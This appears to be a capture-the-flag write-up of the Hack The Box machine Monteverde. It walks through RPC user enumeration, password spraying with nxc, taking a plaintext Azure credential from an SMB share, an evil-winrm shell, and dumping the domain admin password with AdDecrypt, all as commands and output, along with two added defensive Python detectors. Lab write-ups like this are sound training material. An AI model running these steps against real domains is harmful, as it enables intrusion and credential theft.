# Monteverde

`nxc` `azure` `rpc`

* Machine name: Monteverde
* Difficulty: Medium
* OS: Windows - AD

## Enumeration

### NMAP

```
Nmap scan report for 10.10.10.172
Host is up (0.031s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-10 18:30:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
```

### RPC

```
┌──(kali㉿kali)-[~/htb]
└─$ rpcclient 10.10.10.172 -N -U ''
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
```

We now have a list of users.

## Initial access

I tried to brute-force the passwords with nxc, reusing the list of usernames as the password list...

```
┌──(kali㉿kali)-[~/htb/mond]
└─$ nxc smb 10.10.10.172 -u users.txt -p users.txt --continue-on-success
{...}
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:SABatchJobs STATUS_LOGON_FAILURE 
{...}
```
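From the defender's side, the run above leaves a very recognisable trace on the domain controller: a burst of logon failures (4625) against many different accounts from a single source within seconds, followed by a success (4624) from that same source. The following Python is an added example, not part of the original writeup; it flags that pattern over constructed logon-event lines, and the one-line-per-event format, the 60 second window and the five-account threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real logs): 4625 failures against many different
# accounts from one source within seconds, then a 4624 success from that same
# source, which is what the nxc run above produces on the DC. The stray failure
# from a second IP is a normal typo and must not alert.
SAMPLE_LOG = r"""
2024-11-10T18:31:01Z 4625 MEGABANK\Guest 10.10.14.5 0xC000006D
2024-11-10T18:31:01Z 4625 MEGABANK\AAD_987d7f2f57d2 10.10.14.5 0xC000006D
2024-11-10T18:31:02Z 4625 MEGABANK\mhope 10.10.14.5 0xC000006D
2024-11-10T18:31:02Z 4625 MEGABANK\svc-ata 10.10.14.5 0xC000006D
2024-11-10T18:31:03Z 4625 MEGABANK\svc-bexec 10.10.14.5 0xC000006D
2024-11-10T18:31:03Z 4625 MEGABANK\svc-netapp 10.10.14.5 0xC000006D
2024-11-10T18:31:04Z 4625 MEGABANK\dgalanos 10.10.14.5 0xC000006D
2024-11-10T18:31:04Z 4625 MEGABANK\roleary 10.10.14.5 0xC000006D
2024-11-10T18:31:05Z 4625 MEGABANK\smorgan 10.10.14.5 0xC000006D
2024-11-10T18:31:06Z 4624 MEGABANK\SABatchJobs 10.10.14.5 0x0
2024-11-10T18:40:00Z 4625 MEGABANK\mhope 10.10.14.9 0xC000006D
"""

def parse_event(line):
    """Turn one 'timestamp id DOMAIN\\user src_ip status' line into a dict."""
    ts, event_id, account, src, status = line.split()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "id": int(event_id),
            "user": account.split("\\")[-1].lower(), "src": src, "status": status}

def detect_spray(lines, window=timedelta(seconds=60), min_accounts=5):
    """One alert per source that fails against >= min_accounts distinct accounts within `window`."""
    events = sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        failures = [e for e in evs if e["id"] == 4625]
        # Sliding window: how many distinct accounts did this source fail against?
        for i, first in enumerate(failures):
            targeted = {e["user"] for e in failures[i:] if e["ts"] - first["ts"] <= window}
            if len(targeted) >= min_accounts:
                # A success after the burst means the spray found a valid password.
                hits = sorted({e["user"] for e in evs if e["id"] == 4624 and e["ts"] >= first["ts"]})
                alerts.append({"src": src, "accounts": len(targeted), "successes": hits})
                break
    return alerts
```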

```
┌──(kali㉿kali)-[~/htb/mond]
└─$ nxc smb 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.10.10.172    445    MONTEVERDE       [*] Enumerated shares
SMB         10.10.10.172    445    MONTEVERDE       Share           Permissions     Remark
SMB         10.10.10.172    445    MONTEVERDE       -----           -----------     ------
SMB         10.10.10.172    445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.10.10.172    445    MONTEVERDE       azure_uploads   READ            
SMB         10.10.10.172    445    MONTEVERDE       C$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       E$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.10.10.172    445    MONTEVERDE       NETLOGON        READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       SYSVOL          READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       users$          READ  
```

Let's look at the contents of users$.

```
┌──(kali㉿kali)-[~/htb/mond]
└─$ smbclient //10.10.10.172/users$ -U SABatchJobs
Password for [WORKGROUP\SABatchJobs]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020

smb: \> cd mhope
smb: \mhope\> dir
  .                                   D        0  Fri Jan  3 08:41:18 2020
  ..                                  D        0  Fri Jan  3 08:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 08:40:23 2020

		31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> mget azure.xml
Get file azure.xml? yes
getting file \mhope\azure.xml of size 1212 as azure.xml (8.5 KiloBytes/sec) (average 8.5 KiloBytes/sec)
```

And, surprise...

```
┌──(kali㉿kali)-[~/htb/mond]
└─$ cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
```
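The azure.xml above is a PowerShell CLIXML export (the output of Export-Clixml), and the two garbage characters at the start of the cat output are its UTF-16 byte-order mark, which a byte-level grep for "Password" would miss. As an added example that is not part of the original writeup, this Python parses that format and flags credential properties stored as a plaintext `<S>` string rather than a DPAPI-protected `<SS>` SecureString; the sample file is constructed to mirror the layout above with a placeholder password.

```python
import xml.etree.ElementTree as ET

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
SECRET_NAMES = ("password", "secret")

# Constructed sample mirroring the azure.xml layout from the writeup (same object
# type and property names, placeholder password). Windows PowerShell's
# Export-Clixml writes UTF-16LE with a BOM, so the bytes are built that way.
SAMPLE_XML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">constructed-example-p@ss</S>
    </Props>
  </Obj>
</Objs>"""
SAMPLE_RAW = b"\xff\xfe" + SAMPLE_XML.encode("utf-16-le")

def decode_clixml(raw):
    """Decode an Export-Clixml file, honouring a UTF-16 or UTF-8 BOM."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")

def parse_clixml_objects(text):
    """Return [(type_names, {prop_name: (tag, value)})] for every <Obj>."""
    objs = []
    for obj in ET.fromstring(text).iter(PS_NS + "Obj"):
        types = [t.text for t in obj.iterfind(PS_NS + "TN/" + PS_NS + "T")]
        props = {}
        for p in obj.iterfind(PS_NS + "Props/*"):
            if p.get("N"):
                props[p.get("N")] = (p.tag.replace(PS_NS, ""), p.text)
        objs.append((types, props))
    return objs

def find_exposed_secrets(raw):
    """Flag secret-looking properties: <S> is plaintext, <SS> is a DPAPI-protected SecureString."""
    findings = []
    for types, props in parse_clixml_objects(decode_clixml(raw)):
        for name, (tag, value) in props.items():
            if any(k in name.lower() for k in SECRET_NAMES) and value:
                kind = "plaintext" if tag == "S" else "protected" if tag == "SS" else tag
                findings.append((types[0] if types else "?", name, kind))
    return findings
```

Run over a share such as users$, only the "plaintext" findings are an immediate exposure; an `<SS>` value can only be decrypted by the user and machine that exported it.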

```
┌──(kali㉿kali)-[~/htb/mond]
└─$ evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami
megabank\mhope

```

## Privilege escalation

We are a member of the Azure Admins group.

{% embed url="https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip" %}

```
┌──(kali㉿kali)-[~/htb/monde]
└─$ wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
--2024-11-10 14:25:51--  https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/257912912/7117a000-84a7-11ea-8b7b-d19439d5eb39?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241110%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241110T192551Z&X-Amz-Expires=300&X-Amz-Signature=539a62acf2153c8bc4b5187ff9366e9f8f8f007f2b1643fea4bea50c9e65cfe7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DAdDecrypt.zip&response-content-type=application%2Foctet-stream [following]
--2024-11-10 14:25:51--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/257912912/7117a000-84a7-11ea-8b7b-d19439d5eb39?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241110%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241110T192551Z&X-Amz-Expires=300&X-Amz-Signature=539a62acf2153c8bc4b5187ff9366e9f8f8f007f2b1643fea4bea50c9e65cfe7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DAdDecrypt.zip&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 152818 (149K) [application/octet-stream]
Saving to: ‘AdDecrypt.zip’

AdDecrypt.zip                        100%[===================================================================>] 149.24K  --.-KB/s    in 0.06s   

2024-11-10 14:25:51 (2.54 MB/s) - ‘AdDecrypt.zip’ saved [152818/152818]

```

```
*Evil-WinRM* PS C:\Users\mhope\Documents> upload AdDecrypt.exe
                                        
Info: Uploading /home/kali/htb/monde/AdDecrypt.exe to C:\Users\mhope\Documents\AdDecrypt.exe
                                        
Data: 19796 bytes of 19796 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\Users\mhope\Documents> upload mcrypt.dll
                                        
Info: Uploading /home/kali/htb/monde/mcrypt.dll to C:\Users\mhope\Documents\mcrypt.dll
                                        
Data: 445664 bytes of 445664 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\Users\mhope\Documents> cd 'C:\Program Files\Microsoft Azure AD Sync\Bin'


*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Documents\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

```
